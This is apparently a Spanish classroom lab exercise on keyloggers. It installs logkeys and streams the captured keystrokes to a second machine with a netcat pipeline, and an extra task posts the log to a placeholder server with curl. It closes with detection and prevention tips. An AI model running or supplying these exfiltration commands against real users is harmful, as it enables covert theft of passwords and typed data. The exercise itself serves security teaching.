Skip to content

Práctica 6. Ampliación

Envía Información de Keylogger a Otro Ordenador

Sigue estos pasos para enviar la información capturada por un keylogger a otro ordenador. Utiliza Netcat para transmitir los datos de forma sencilla por la red.

Parte 1: Configura el Keylogger para Enviar Información

Simula el uso de un keylogger para registrar las pulsaciones de teclas y envía esta información a un sistema remoto usando Netcat.

1. Instala y Configura el Keylogger

  1. Actualiza tu sistema:
    sudo apt update && sudo apt upgrade -y
    
  2. Instala logkeys:
    sudo apt install logkeys
    
  3. Inicia el keylogger para registrar las teclas presionadas:
    sudo logkeys --start
    
    El archivo de registro se guardará en /tmp/logkeys.log.

Parte 2: Envía las Pulsaciones de Teclas a Otro Ordenador

Configura el sistema receptor y el sistema atacante para transferir los datos capturados.

1. Configura el Ordenador Receptor

  1. Abre una terminal en el ordenador receptor y ejecuta:
    nc -lvp 4444 > received_keys.txt
    
    Así escucharás en el puerto 4444 y guardarás los datos en received_keys.txt.

2. Configura el Ordenador Atacante (Envía los Datos)

  1. Redirige las pulsaciones registradas por logkeys hacia Netcat:

    sudo tail -f /tmp/logkeys.log | nc <IP_DEL_RECEPTOR> 4444
    
    Sustituye <IP_DEL_RECEPTOR> por la IP del ordenador receptor.

    Explicación: - tail -f /tmp/logkeys.log: Muestra el contenido del archivo de log en tiempo real. - | nc <IP_DEL_RECEPTOR> 4444: Envía los datos en tiempo real al puerto 4444 del receptor.

3. Simula el Robo de Datos

  1. Escribe texto en la terminal o en cualquier aplicación en el ordenador atacante. Las pulsaciones serán capturadas y enviadas al sistema receptor.
  2. En el receptor, visualiza las teclas presionadas:
    cat received_keys.txt
    
    Así verás todas las pulsaciones capturadas.

Parte 3: Aplica Medidas de Seguridad y Prevención

Comprende cómo protegerte frente a este tipo de ataque:

  1. Detecta Keyloggers:

    • Revisa los procesos en ejecución y busca actividad sospechosa.
    • Usa herramientas como chkrootkit o rkhunter.
  2. Prevén con Antivirus:

    • Utiliza ClamAV para detectar malware, aunque no todos los keyloggers serán detectados.
  3. Utiliza teclados en pantalla y autenticación multifactorial (MFA):

    • Protege tus contraseñas usando teclados en pantalla o MFA.
  4. Monitorea la red:

    • Supervisa el tráfico para detectar comunicaciones sospechosas.
  5. Cifra las comunicaciones:

    • Usa conexiones seguras (SSH, VPN) en vez de protocolos no cifrados como Netcat o FTP.

Ejercicio Adicional: Simula la Exfiltración de Datos a un Servidor Remoto

Modifica el script del keylogger para enviar los datos por FTP o HTTP a un servidor remoto.

Por ejemplo, usa curl para enviar los datos a un servidor web:

sudo tail -f /tmp/logkeys.log | curl -X POST -d @- http://<IP_DEL_SERVIDOR>/logkeys
Así enviarás las teclas registradas a un servidor web donde un script puede recibir los datos.

Reflexiona

Identifica los riesgos asociados con el uso de keyloggers y otros programas maliciosos. Aplica medidas de seguridad para protegerte contra estos ataques y comprende cómo prevenir y mitigar su impacto en un entorno real.